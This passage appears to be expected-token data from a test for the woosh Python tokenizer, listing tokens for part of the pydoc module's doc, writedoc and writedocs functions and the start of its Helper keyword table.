woosh.Token(woosh.NAME, 'inspect', 1762, 14, 1762, 21),
woosh.Token(woosh.OP, '.', 1762, 21, 1762, 22),
woosh.Token(woosh.NAME, 'isroutine', 1762, 22, 1762, 31),
woosh.Token(woosh.OP, '(', 1762, 31, 1762, 32),
woosh.Token(woosh.NAME, 'object', 1762, 32, 1762, 38),
woosh.Token(woosh.OP, ')', 1762, 38, 1762, 39),
woosh.Token(woosh.NAME, 'or', 1762, 40, 1762, 42),
woosh.Token(woosh.NAME, 'inspect', 1763, 14, 1763, 21),
woosh.Token(woosh.OP, '.', 1763, 21, 1763, 22),
woosh.Token(woosh.NAME, 'isdatadescriptor', 1763, 22, 1763, 38),
woosh.Token(woosh.OP, '(', 1763, 38, 1763, 39),
woosh.Token(woosh.NAME, 'object', 1763, 39, 1763, 45),
woosh.Token(woosh.OP, ')', 1763, 45, 1763, 46),
woosh.Token(woosh.NAME, 'or', 1763, 47, 1763, 49),
woosh.Token(woosh.NAME, '_getdoc', 1764, 14, 1764, 21),
woosh.Token(woosh.OP, '(', 1764, 21, 1764, 22),
woosh.Token(woosh.NAME, 'object', 1764, 22, 1764, 28),
woosh.Token(woosh.OP, ')', 1764, 28, 1764, 29),
woosh.Token(woosh.OP, ')', 1764, 29, 1764, 30),
woosh.Token(woosh.OP, ':', 1764, 30, 1764, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1764, 31, 1765, 0),
woosh.Token(woosh.COMMENT, '# If the passed object is a piece of data or an instance,', 1765, 8, 1765, 65),
woosh.Token(woosh.COMMENT, '# document its available methods instead of its value.', 1766, 8, 1766, 62),
woosh.Token(woosh.INDENT, ' ', 1767, 0, 1767, 8),
woosh.Token(woosh.NAME, 'if', 1767, 8, 1767, 10),
woosh.Token(woosh.NAME, 'hasattr', 1767, 11, 1767, 18),
woosh.Token(woosh.OP, '(', 1767, 18, 1767, 19),
woosh.Token(woosh.NAME, 'object', 1767, 19, 1767, 25),
woosh.Token(woosh.OP, ',', 1767, 25, 1767, 26),
woosh.Token(woosh.STRING, "'__origin__'", 1767, 27, 1767, 39),
woosh.Token(woosh.OP, ')', 1767, 39, 1767, 40),
woosh.Token(woosh.OP, ':', 1767, 40, 1767, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1767, 41, 1768, 0),
woosh.Token(woosh.INDENT, ' ', 1768, 0, 1768, 12),
woosh.Token(woosh.NAME, 'object', 1768, 12, 1768, 18),
woosh.Token(woosh.OP, '=', 1768, 19, 1768, 20),
woosh.Token(woosh.NAME, 'object', 1768, 21, 1768, 27),
woosh.Token(woosh.OP, '.', 1768, 27, 1768, 28),
woosh.Token(woosh.NAME, '__origin__', 1768, 28, 1768, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1768, 38, 1769, 0),
woosh.Token(woosh.DEDENT, ' ', 1769, 0, 1769, 8),
woosh.Token(woosh.NAME, 'else', 1769, 8, 1769, 12),
woosh.Token(woosh.OP, ':', 1769, 12, 1769, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1769, 13, 1770, 0),
woosh.Token(woosh.INDENT, ' ', 1770, 0, 1770, 12),
woosh.Token(woosh.NAME, 'object', 1770, 12, 1770, 18),
woosh.Token(woosh.OP, '=', 1770, 19, 1770, 20),
woosh.Token(woosh.NAME, 'type', 1770, 21, 1770, 25),
woosh.Token(woosh.OP, '(', 1770, 25, 1770, 26),
woosh.Token(woosh.NAME, 'object', 1770, 26, 1770, 32),
woosh.Token(woosh.OP, ')', 1770, 32, 1770, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 1770, 33, 1771, 0),
woosh.Token(woosh.NAME, 'desc', 1771, 12, 1771, 16),
woosh.Token(woosh.OP, '+=', 1771, 17, 1771, 19),
woosh.Token(woosh.STRING, "' object'", 1771, 20, 1771, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1771, 29, 1772, 0),
woosh.Token(woosh.DEDENT, ' ', 1772, 0, 1772, 4),
woosh.Token(woosh.DEDENT, '', 1772, 4, 1772, 4),
woosh.Token(woosh.NAME, 'return', 1772, 4, 1772, 10),
woosh.Token(woosh.NAME, 'title', 1772, 11, 1772, 16),
woosh.Token(woosh.OP, '%', 1772, 17, 1772, 18),
woosh.Token(woosh.NAME, 'desc', 1772, 19, 1772, 23),
woosh.Token(woosh.OP, '+', 1772, 24, 1772, 25),
woosh.Token(woosh.STRING, "'\\n\\n'", 1772, 26, 1772, 32),
woosh.Token(woosh.OP, '+', 1772, 33, 1772, 34),
woosh.Token(woosh.NAME, 'renderer', 1772, 35, 1772, 43),
woosh.Token(woosh.OP, '.', 1772, 43, 1772, 44),
woosh.Token(woosh.NAME, 'document', 1772, 44, 1772, 52),
woosh.Token(woosh.OP, '(', 1772, 52, 1772, 53),
woosh.Token(woosh.NAME, 'object', 1772, 53, 1772, 59),
woosh.Token(woosh.OP, ',', 1772, 59, 1772, 60),
woosh.Token(woosh.NAME, 'name', 1772, 61, 1772, 65),
woosh.Token(woosh.OP, ')', 1772, 65, 1772, 66),
woosh.Token(woosh.NEWLINE, '\r\n', 1772, 66, 1773, 0),
woosh.Token(woosh.DEDENT, '', 1774, 0, 1774, 0),
woosh.Token(woosh.NAME, 'def', 1774, 0, 1774, 3),
woosh.Token(woosh.NAME, 'doc', 1774, 4, 1774, 7),
woosh.Token(woosh.OP, '(', 1774, 7, 1774, 8),
woosh.Token(woosh.NAME, 'thing', 1774, 8, 1774, 13),
woosh.Token(woosh.OP, ',', 1774, 13, 1774, 14),
woosh.Token(woosh.NAME, 'title', 1774, 15, 1774, 20),
woosh.Token(woosh.OP, '=', 1774, 20, 1774, 21),
woosh.Token(woosh.STRING, "'Python Library Documentation: %s'", 1774, 21, 1774, 55),
woosh.Token(woosh.OP, ',', 1774, 55, 1774, 56),
woosh.Token(woosh.NAME, 'forceload', 1774, 57, 1774, 66),
woosh.Token(woosh.OP, '=', 1774, 66, 1774, 67),
woosh.Token(woosh.NUMBER, '0', 1774, 67, 1774, 68),
woosh.Token(woosh.OP, ',', 1774, 68, 1774, 69),
woosh.Token(woosh.NAME, 'output', 1775, 8, 1775, 14),
woosh.Token(woosh.OP, '=', 1775, 14, 1775, 15),
woosh.Token(woosh.NAME, 'None', 1775, 15, 1775, 19),
woosh.Token(woosh.OP, ')', 1775, 19, 1775, 20),
woosh.Token(woosh.OP, ':', 1775, 20, 1775, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1775, 21, 1776, 0),
woosh.Token(woosh.INDENT, ' ', 1776, 0, 1776, 4),
woosh.Token(woosh.STRING, '"""Display text documentation, given an object or a path to an object."""', 1776, 4, 1776, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 1776, 77, 1777, 0),
woosh.Token(woosh.NAME, 'try', 1777, 4, 1777, 7),
woosh.Token(woosh.OP, ':', 1777, 7, 1777, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 1777, 8, 1778, 0),
woosh.Token(woosh.INDENT, ' ', 1778, 0, 1778, 8),
woosh.Token(woosh.NAME, 'if', 1778, 8, 1778, 10),
woosh.Token(woosh.NAME, 'output', 1778, 11, 1778, 17),
woosh.Token(woosh.NAME, 'is', 1778, 18, 1778, 20),
woosh.Token(woosh.NAME, 'None', 1778, 21, 1778, 25),
woosh.Token(woosh.OP, ':', 1778, 25, 1778, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 1778, 26, 1779, 0),
woosh.Token(woosh.INDENT, ' ', 1779, 0, 1779, 12),
woosh.Token(woosh.NAME, 'pager', 1779, 12, 1779, 17),
woosh.Token(woosh.OP, '(', 1779, 17, 1779, 18),
woosh.Token(woosh.NAME, 'render_doc', 1779, 18, 1779, 28),
woosh.Token(woosh.OP, '(', 1779, 28, 1779, 29),
woosh.Token(woosh.NAME, 'thing', 1779, 29, 1779, 34),
woosh.Token(woosh.OP, ',', 1779, 34, 1779, 35),
woosh.Token(woosh.NAME, 'title', 1779, 36, 1779, 41),
woosh.Token(woosh.OP, ',', 1779, 41, 1779, 42),
woosh.Token(woosh.NAME, 'forceload', 1779, 43, 1779, 52),
woosh.Token(woosh.OP, ')', 1779, 52, 1779, 53),
woosh.Token(woosh.OP, ')', 1779, 53, 1779, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 1779, 54, 1780, 0),
woosh.Token(woosh.DEDENT, ' ', 1780, 0, 1780, 8),
woosh.Token(woosh.NAME, 'else', 1780, 8, 1780, 12),
woosh.Token(woosh.OP, ':', 1780, 12, 1780, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1780, 13, 1781, 0),
woosh.Token(woosh.INDENT, ' ', 1781, 0, 1781, 12),
woosh.Token(woosh.NAME, 'output', 1781, 12, 1781, 18),
woosh.Token(woosh.OP, '.', 1781, 18, 1781, 19),
woosh.Token(woosh.NAME, 'write', 1781, 19, 1781, 24),
woosh.Token(woosh.OP, '(', 1781, 24, 1781, 25),
woosh.Token(woosh.NAME, 'render_doc', 1781, 25, 1781, 35),
woosh.Token(woosh.OP, '(', 1781, 35, 1781, 36),
woosh.Token(woosh.NAME, 'thing', 1781, 36, 1781, 41),
woosh.Token(woosh.OP, ',', 1781, 41, 1781, 42),
woosh.Token(woosh.NAME, 'title', 1781, 43, 1781, 48),
woosh.Token(woosh.OP, ',', 1781, 48, 1781, 49),
woosh.Token(woosh.NAME, 'forceload', 1781, 50, 1781, 59),
woosh.Token(woosh.OP, ',', 1781, 59, 1781, 60),
woosh.Token(woosh.NAME, 'plaintext', 1781, 61, 1781, 70),
woosh.Token(woosh.OP, ')', 1781, 70, 1781, 71),
woosh.Token(woosh.OP, ')', 1781, 71, 1781, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 1781, 72, 1782, 0),
woosh.Token(woosh.DEDENT, ' ', 1782, 0, 1782, 4),
woosh.Token(woosh.DEDENT, '', 1782, 4, 1782, 4),
woosh.Token(woosh.NAME, 'except', 1782, 4, 1782, 10),
woosh.Token(woosh.OP, '(', 1782, 11, 1782, 12),
woosh.Token(woosh.NAME, 'ImportError', 1782, 12, 1782, 23),
woosh.Token(woosh.OP, ',', 1782, 23, 1782, 24),
woosh.Token(woosh.NAME, 'ErrorDuringImport', 1782, 25, 1782, 42),
woosh.Token(woosh.OP, ')', 1782, 42, 1782, 43),
woosh.Token(woosh.NAME, 'as', 1782, 44, 1782, 46),
woosh.Token(woosh.NAME, 'value', 1782, 47, 1782, 52),
woosh.Token(woosh.OP, ':', 1782, 52, 1782, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1782, 53, 1783, 0),
woosh.Token(woosh.INDENT, ' ', 1783, 0, 1783, 8),
woosh.Token(woosh.NAME, 'print', 1783, 8, 1783, 13),
woosh.Token(woosh.OP, '(', 1783, 13, 1783, 14),
woosh.Token(woosh.NAME, 'value', 1783, 14, 1783, 19),
woosh.Token(woosh.OP, ')', 1783, 19, 1783, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1783, 20, 1784, 0),
woosh.Token(woosh.DEDENT, '', 1785, 0, 1785, 0),
woosh.Token(woosh.DEDENT, '', 1785, 0, 1785, 0),
woosh.Token(woosh.NAME, 'def', 1785, 0, 1785, 3),
woosh.Token(woosh.NAME, 'writedoc', 1785, 4, 1785, 12),
woosh.Token(woosh.OP, '(', 1785, 12, 1785, 13),
woosh.Token(woosh.NAME, 'thing', 1785, 13, 1785, 18),
woosh.Token(woosh.OP, ',', 1785, 18, 1785, 19),
woosh.Token(woosh.NAME, 'forceload', 1785, 20, 1785, 29),
woosh.Token(woosh.OP, '=', 1785, 29, 1785, 30),
woosh.Token(woosh.NUMBER, '0', 1785, 30, 1785, 31),
woosh.Token(woosh.OP, ')', 1785, 31, 1785, 32),
woosh.Token(woosh.OP, ':', 1785, 32, 1785, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 1785, 33, 1786, 0),
woosh.Token(woosh.INDENT, ' ', 1786, 0, 1786, 4),
woosh.Token(woosh.STRING, '"""Write HTML documentation to a file in the current directory."""', 1786, 4, 1786, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 1786, 70, 1787, 0),
woosh.Token(woosh.NAME, 'try', 1787, 4, 1787, 7),
woosh.Token(woosh.OP, ':', 1787, 7, 1787, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 1787, 8, 1788, 0),
woosh.Token(woosh.INDENT, ' ', 1788, 0, 1788, 8),
woosh.Token(woosh.NAME, 'object', 1788, 8, 1788, 14),
woosh.Token(woosh.OP, ',', 1788, 14, 1788, 15),
woosh.Token(woosh.NAME, 'name', 1788, 16, 1788, 20),
woosh.Token(woosh.OP, '=', 1788, 21, 1788, 22),
woosh.Token(woosh.NAME, 'resolve', 1788, 23, 1788, 30),
woosh.Token(woosh.OP, '(', 1788, 30, 1788, 31),
woosh.Token(woosh.NAME, 'thing', 1788, 31, 1788, 36),
woosh.Token(woosh.OP, ',', 1788, 36, 1788, 37),
woosh.Token(woosh.NAME, 'forceload', 1788, 38, 1788, 47),
woosh.Token(woosh.OP, ')', 1788, 47, 1788, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 1788, 48, 1789, 0),
woosh.Token(woosh.NAME, 'page', 1789, 8, 1789, 12),
woosh.Token(woosh.OP, '=', 1789, 13, 1789, 14),
woosh.Token(woosh.NAME, 'html', 1789, 15, 1789, 19),
woosh.Token(woosh.OP, '.', 1789, 19, 1789, 20),
woosh.Token(woosh.NAME, 'page', 1789, 20, 1789, 24),
woosh.Token(woosh.OP, '(', 1789, 24, 1789, 25),
woosh.Token(woosh.NAME, 'describe', 1789, 25, 1789, 33),
woosh.Token(woosh.OP, '(', 1789, 33, 1789, 34),
woosh.Token(woosh.NAME, 'object', 1789, 34, 1789, 40),
woosh.Token(woosh.OP, ')', 1789, 40, 1789, 41),
woosh.Token(woosh.OP, ',', 1789, 41, 1789, 42),
woosh.Token(woosh.NAME, 'html', 1789, 43, 1789, 47),
woosh.Token(woosh.OP, '.', 1789, 47, 1789, 48),
woosh.Token(woosh.NAME, 'document', 1789, 48, 1789, 56),
woosh.Token(woosh.OP, '(', 1789, 56, 1789, 57),
woosh.Token(woosh.NAME, 'object', 1789, 57, 1789, 63),
woosh.Token(woosh.OP, ',', 1789, 63, 1789, 64),
woosh.Token(woosh.NAME, 'name', 1789, 65, 1789, 69),
woosh.Token(woosh.OP, ')', 1789, 69, 1789, 70),
woosh.Token(woosh.OP, ')', 1789, 70, 1789, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 1789, 71, 1790, 0),
woosh.Token(woosh.NAME, 'with', 1790, 8, 1790, 12),
woosh.Token(woosh.NAME, 'open', 1790, 13, 1790, 17),
woosh.Token(woosh.OP, '(', 1790, 17, 1790, 18),
woosh.Token(woosh.NAME, 'name', 1790, 18, 1790, 22),
woosh.Token(woosh.OP, '+', 1790, 23, 1790, 24),
woosh.Token(woosh.STRING, "'.html'", 1790, 25, 1790, 32),
woosh.Token(woosh.OP, ',', 1790, 32, 1790, 33),
woosh.Token(woosh.STRING, "'w'", 1790, 34, 1790, 37),
woosh.Token(woosh.OP, ',', 1790, 37, 1790, 38),
woosh.Token(woosh.NAME, 'encoding', 1790, 39, 1790, 47),
woosh.Token(woosh.OP, '=', 1790, 47, 1790, 48),
woosh.Token(woosh.STRING, "'utf-8'", 1790, 48, 1790, 55),
woosh.Token(woosh.OP, ')', 1790, 55, 1790, 56),
woosh.Token(woosh.NAME, 'as', 1790, 57, 1790, 59),
woosh.Token(woosh.NAME, 'file', 1790, 60, 1790, 64),
woosh.Token(woosh.OP, ':', 1790, 64, 1790, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 1790, 65, 1791, 0),
woosh.Token(woosh.INDENT, ' ', 1791, 0, 1791, 12),
woosh.Token(woosh.NAME, 'file', 1791, 12, 1791, 16),
woosh.Token(woosh.OP, '.', 1791, 16, 1791, 17),
woosh.Token(woosh.NAME, 'write', 1791, 17, 1791, 22),
woosh.Token(woosh.OP, '(', 1791, 22, 1791, 23),
woosh.Token(woosh.NAME, 'page', 1791, 23, 1791, 27),
woosh.Token(woosh.OP, ')', 1791, 27, 1791, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1791, 28, 1792, 0),
woosh.Token(woosh.DEDENT, ' ', 1792, 0, 1792, 8),
woosh.Token(woosh.NAME, 'print', 1792, 8, 1792, 13),
woosh.Token(woosh.OP, '(', 1792, 13, 1792, 14),
woosh.Token(woosh.STRING, "'wrote'", 1792, 14, 1792, 21),
woosh.Token(woosh.OP, ',', 1792, 21, 1792, 22),
woosh.Token(woosh.NAME, 'name', 1792, 23, 1792, 27),
woosh.Token(woosh.OP, '+', 1792, 28, 1792, 29),
woosh.Token(woosh.STRING, "'.html'", 1792, 30, 1792, 37),
woosh.Token(woosh.OP, ')', 1792, 37, 1792, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1792, 38, 1793, 0),
woosh.Token(woosh.DEDENT, ' ', 1793, 0, 1793, 4),
woosh.Token(woosh.NAME, 'except', 1793, 4, 1793, 10),
woosh.Token(woosh.OP, '(', 1793, 11, 1793, 12),
woosh.Token(woosh.NAME, 'ImportError', 1793, 12, 1793, 23),
woosh.Token(woosh.OP, ',', 1793, 23, 1793, 24),
woosh.Token(woosh.NAME, 'ErrorDuringImport', 1793, 25, 1793, 42),
woosh.Token(woosh.OP, ')', 1793, 42, 1793, 43),
woosh.Token(woosh.NAME, 'as', 1793, 44, 1793, 46),
woosh.Token(woosh.NAME, 'value', 1793, 47, 1793, 52),
woosh.Token(woosh.OP, ':', 1793, 52, 1793, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1793, 53, 1794, 0),
woosh.Token(woosh.INDENT, ' ', 1794, 0, 1794, 8),
woosh.Token(woosh.NAME, 'print', 1794, 8, 1794, 13),
woosh.Token(woosh.OP, '(', 1794, 13, 1794, 14),
woosh.Token(woosh.NAME, 'value', 1794, 14, 1794, 19),
woosh.Token(woosh.OP, ')', 1794, 19, 1794, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1794, 20, 1795, 0),
woosh.Token(woosh.DEDENT, '', 1796, 0, 1796, 0),
woosh.Token(woosh.DEDENT, '', 1796, 0, 1796, 0),
woosh.Token(woosh.NAME, 'def', 1796, 0, 1796, 3),
woosh.Token(woosh.NAME, 'writedocs', 1796, 4, 1796, 13),
woosh.Token(woosh.OP, '(', 1796, 13, 1796, 14),
woosh.Token(woosh.NAME, 'dir', 1796, 14, 1796, 17),
woosh.Token(woosh.OP, ',', 1796, 17, 1796, 18),
woosh.Token(woosh.NAME, 'pkgpath', 1796, 19, 1796, 26),
woosh.Token(woosh.OP, '=', 1796, 26, 1796, 27),
woosh.Token(woosh.STRING, "''", 1796, 27, 1796, 29),
woosh.Token(woosh.OP, ',', 1796, 29, 1796, 30),
woosh.Token(woosh.NAME, 'done', 1796, 31, 1796, 35),
woosh.Token(woosh.OP, '=', 1796, 35, 1796, 36),
woosh.Token(woosh.NAME, 'None', 1796, 36, 1796, 40),
woosh.Token(woosh.OP, ')', 1796, 40, 1796, 41),
woosh.Token(woosh.OP, ':', 1796, 41, 1796, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1796, 42, 1797, 0),
woosh.Token(woosh.INDENT, ' ', 1797, 0, 1797, 4),
woosh.Token(woosh.STRING, '"""Write out HTML documentation for all modules in a directory tree."""', 1797, 4, 1797, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 1797, 75, 1798, 0),
woosh.Token(woosh.NAME, 'if', 1798, 4, 1798, 6),
woosh.Token(woosh.NAME, 'done', 1798, 7, 1798, 11),
woosh.Token(woosh.NAME, 'is', 1798, 12, 1798, 14),
woosh.Token(woosh.NAME, 'None', 1798, 15, 1798, 19),
woosh.Token(woosh.OP, ':', 1798, 19, 1798, 20),
woosh.Token(woosh.NAME, 'done', 1798, 21, 1798, 25),
woosh.Token(woosh.OP, '=', 1798, 26, 1798, 27),
woosh.Token(woosh.OP, '{', 1798, 28, 1798, 29),
woosh.Token(woosh.OP, '}', 1798, 29, 1798, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1798, 30, 1799, 0),
woosh.Token(woosh.NAME, 'for', 1799, 4, 1799, 7),
woosh.Token(woosh.NAME, 'importer', 1799, 8, 1799, 16),
woosh.Token(woosh.OP, ',', 1799, 16, 1799, 17),
woosh.Token(woosh.NAME, 'modname', 1799, 18, 1799, 25),
woosh.Token(woosh.OP, ',', 1799, 25, 1799, 26),
woosh.Token(woosh.NAME, 'ispkg', 1799, 27, 1799, 32),
woosh.Token(woosh.NAME, 'in', 1799, 33, 1799, 35),
woosh.Token(woosh.NAME, 'pkgutil', 1799, 36, 1799, 43),
woosh.Token(woosh.OP, '.', 1799, 43, 1799, 44),
woosh.Token(woosh.NAME, 'walk_packages', 1799, 44, 1799, 57),
woosh.Token(woosh.OP, '(', 1799, 57, 1799, 58),
woosh.Token(woosh.OP, '[', 1799, 58, 1799, 59),
woosh.Token(woosh.NAME, 'dir', 1799, 59, 1799, 62),
woosh.Token(woosh.OP, ']', 1799, 62, 1799, 63),
woosh.Token(woosh.OP, ',', 1799, 63, 1799, 64),
woosh.Token(woosh.NAME, 'pkgpath', 1799, 65, 1799, 72),
woosh.Token(woosh.OP, ')', 1799, 72, 1799, 73),
woosh.Token(woosh.OP, ':', 1799, 73, 1799, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 1799, 74, 1800, 0),
woosh.Token(woosh.INDENT, ' ', 1800, 0, 1800, 8),
woosh.Token(woosh.NAME, 'writedoc', 1800, 8, 1800, 16),
woosh.Token(woosh.OP, '(', 1800, 16, 1800, 17),
woosh.Token(woosh.NAME, 'modname', 1800, 17, 1800, 24),
woosh.Token(woosh.OP, ')', 1800, 24, 1800, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1800, 25, 1801, 0),
woosh.Token(woosh.DEDENT, ' ', 1801, 0, 1801, 4),
woosh.Token(woosh.NAME, 'return', 1801, 4, 1801, 10),
woosh.Token(woosh.NEWLINE, '\r\n', 1801, 10, 1802, 0),
woosh.Token(woosh.DEDENT, '', 1803, 0, 1803, 0),
woosh.Token(woosh.NAME, 'class', 1803, 0, 1803, 5),
woosh.Token(woosh.NAME, 'Helper', 1803, 6, 1803, 12),
woosh.Token(woosh.OP, ':', 1803, 12, 1803, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1803, 13, 1804, 0),
woosh.Token(woosh.COMMENT, '# These dictionaries map a topic name to either an alias, or a tuple', 1805, 4, 1805, 72),
woosh.Token(woosh.COMMENT, '# (label, seealso-items). The "label" is the label of the corresponding', 1806, 4, 1806, 76),
woosh.Token(woosh.COMMENT, '# section in the .rst file under Doc/ and an index into the dictionary', 1807, 4, 1807, 74),
woosh.Token(woosh.COMMENT, '# in pydoc_data/topics.py.', 1808, 4, 1808, 30),
woosh.Token(woosh.COMMENT, '#', 1809, 4, 1809, 5),
woosh.Token(woosh.COMMENT, '# CAUTION: if you change one of these dictionaries, be sure to adapt the', 1810, 4, 1810, 76),
woosh.Token(woosh.COMMENT, '# list of needed labels in Doc/tools/extensions/pyspecific.py and', 1811, 4, 1811, 78),
woosh.Token(woosh.COMMENT, '# regenerate the pydoc_data/topics.py file by running', 1812, 4, 1812, 66),
woosh.Token(woosh.COMMENT, '# make pydoc-topics', 1813, 4, 1813, 36),
woosh.Token(woosh.COMMENT, '# in Doc/ and copying the output file into the Lib/ directory.', 1814, 4, 1814, 75),
woosh.Token(woosh.INDENT, ' ', 1816, 0, 1816, 4),
woosh.Token(woosh.NAME, 'keywords', 1816, 4, 1816, 12),
woosh.Token(woosh.OP, '=', 1816, 13, 1816, 14),
woosh.Token(woosh.OP, '{', 1816, 15, 1816, 16),
woosh.Token(woosh.STRING, "'False'", 1817, 8, 1817, 15),
woosh.Token(woosh.OP, ':', 1817, 15, 1817, 16),
woosh.Token(woosh.STRING, "''", 1817, 17, 1817, 19),
woosh.Token(woosh.OP, ',', 1817, 19, 1817, 20),
woosh.Token(woosh.STRING, "'None'", 1818, 8, 1818, 14),
woosh.Token(woosh.OP, ':', 1818, 14, 1818, 15),
woosh.Token(woosh.STRING, "''", 1818, 16, 1818, 18),
woosh.Token(woosh.OP, ',', 1818, 18, 1818, 19),
woosh.Token(woosh.STRING, "'True'", 1819, 8, 1819, 14),
woosh.Token(woosh.OP, ':', 1819, 14, 1819, 15),
woosh.Token(woosh.STRING, "''", 1819, 16, 1819, 18),
woosh.Token(woosh.OP, ',', 1819, 18, 1819, 19),
woosh.Token(woosh.STRING, "'and'", 1820, 8, 1820, 13),
woosh.Token(woosh.OP, ':', 1820, 13, 1820, 14),
woosh.Token(woosh.STRING, "'BOOLEAN'", 1820, 15, 1820, 24),
woosh.Token(woosh.OP, ',', 1820, 24, 1820, 25),
woosh.Token(woosh.STRING, "'as'", 1821, 8, 1821, 12),
woosh.Token(woosh.OP, ':', 1821, 12, 1821, 13),
woosh.Token(woosh.STRING, "'with'", 1821, 14, 1821, 20),
woosh.Token(woosh.OP, ',', 1821, 20, 1821, 21),
woosh.Token(woosh.STRING, "'assert'", 1822, 8, 1822, 16),
woosh.Token(woosh.OP, ':', 1822, 16, 1822, 17),
woosh.Token(woosh.OP, '(', 1822, 18, 1822, 19),
woosh.Token(woosh.STRING, "'assert'", 1822, 19, 1822, 27),
woosh.Token(woosh.OP, ',', 1822, 27, 1822, 28),
woosh.Token(woosh.STRING, "''", 1822, 29, 1822, 31),
woosh.Token(woosh.OP, ')', 1822, 31, 1822, 32),
woosh.Token(woosh.OP, ',', 1822, 32, 1822, 33),
woosh.Token(woosh.STRING, "'async'", 1823, 8, 1823, 15),
woosh.Token(woosh.OP, ':', 1823, 15, 1823, 16),
woosh.Token(woosh.OP, '(', 1823, 17, 1823, 18),
woosh.Token(woosh.STRING, "'async'", 1823, 18, 1823, 25),
woosh.Token(woosh.OP, ',', 1823, 25, 1823, 26),
woosh.Token(woosh.STRING, "''", 1823, 27, 1823, 29),
woosh.Token(woosh.OP, ')', 1823, 29, 1823, 30),
woosh.Token(woosh.OP, ',', 1823, 30, 1823, 31),
woosh.Token(woosh.STRING, "'await'", 1824, 8, 1824, 15),
woosh.Token(woosh.OP, ':', 1824, 15, 1824, 16),
woosh.Token(woosh.OP, '(', 1824, 17, 1824, 18),
woosh.Token(woosh.STRING, "'await'", 1824, 18, 1824, 25),
woosh.Token(woosh.OP, ',', 1824, 25, 1824, 26),
woosh.Token(woosh.STRING, "''", 1824, 27, 1824, 29),
woosh.Token(woosh.OP, ')', 1824, 29, 1824, 30),
woosh.Token(woosh.OP, ',', 1824, 30, 1824, 31),
woosh.Token(woosh.STRING, "'break'", 1825, 8, 1825, 15),
woosh.Token(woosh.OP, ':', 1825, 15, 1825, 16),
woosh.Token(woosh.OP, '(', 1825, 17, 1825, 18),
woosh.Token(woosh.STRING, "'break'", 1825, 18, 1825, 25),
woosh.Token(woosh.OP, ',', 1825, 25, 1825, 26),
woosh.Token(woosh.STRING, "'while for'", 1825, 27, 1825, 38),
woosh.Token(woosh.OP, ')', 1825, 38, 1825, 39),
woosh.Token(woosh.OP, ',', 1825, 39, 1825, 40),
woosh.Token(woosh.STRING, "'class'", 1826, 8, 1826, 15),
woosh.Token(woosh.OP, ':', 1826, 15, 1826, 16),
woosh.Token(woosh.OP, '(', 1826, 17, 1826, 18),
woosh.Token(woosh.STRING, "'class'", 1826, 18, 1826, 25),
woosh.Token(woosh.OP, ',', 1826, 25, 1826, 26),
woosh.Token(woosh.STRING, "'CLASSES SPECIALMETHODS'", 1826, 27, 1826, 51),
woosh.Token(woosh.OP, ')', 1826, 51, 1826, 52),
woosh.Token(woosh.OP, ',', 1826, 52, 1826, 53),
woosh.Token(woosh.STRING, "'continue'", 1827, 8, 1827, 18),
woosh.Token(woosh.OP, ':', 1827, 18, 1827, 19),
woosh.Token(woosh.OP, '(', 1827, 20, 1827, 21),
woosh.Token(woosh.STRING, "'continue'", 1827, 21, 1827, 31),
woosh.Token(woosh.OP, ',', 1827, 31, 1827, 32),
woosh.Token(woosh.STRING, "'while for'", 1827, 33, 1827, 44),
woosh.Token(woosh.OP, ')', 1827, 44, 1827, 45),
woosh.Token(woosh.OP, ',', 1827, 45, 1827, 46),
woosh.Token(woosh.STRING, "'def'", 1828, 8, 1828, 13),
woosh.Token(woosh.OP, ':', 1828, 13, 1828, 14),
woosh.Token(woosh.OP, '(', 1828, 15, 1828, 16),
woosh.Token(woosh.STRING, "'function'", 1828, 16, 1828, 26),
woosh.Token(woosh.OP, ',', 1828, 26, 1828, 27),
woosh.Token(woosh.STRING, "''", 1828, 28, 1828, 30),
woosh.Token(woosh.OP, ')', 1828, 30, 1828, 31),
woosh.Token(woosh.OP, ',', 1828, 31, 1828, 32),
woosh.Token(woosh.STRING, "'del'", 1829, 8, 1829, 13),
woosh.Token(woosh.OP, ':', 1829, 13, 1829, 14),
woosh.Token(woosh.OP, '(', 1829, 15, 1829, 16),
woosh.Token(woosh.STRING, "'del'", 1829, 16, 1829, 21),
woosh.Token(woosh.OP, ',', 1829, 21, 1829, 22),
woosh.Token(woosh.STRING, "'BASICMETHODS'", 1829, 23, 1829, 37),
woosh.Token(woosh.OP, ')', 1829, 37, 1829, 38),
woosh.Token(woosh.OP, ',', 1829, 38, 1829, 39),
woosh.Token(woosh.STRING, "'elif'", 1830, 8, 1830, 14),
woosh.Token(woosh.OP, ':', 1830, 14, 1830, 15),
woosh.Token(woosh.STRING, "'if'", 1830, 16, 1830, 20),
woosh.Token(woosh.OP, ',', 1830, 20, 1830, 21),
woosh.Token(woosh.STRING, "'else'", 1831, 8, 1831, 14),
woosh.Token(woosh.OP, ':', 1831, 14, 1831, 15),
woosh.Token(woosh.OP, '(', 1831, 16, 1831, 17),
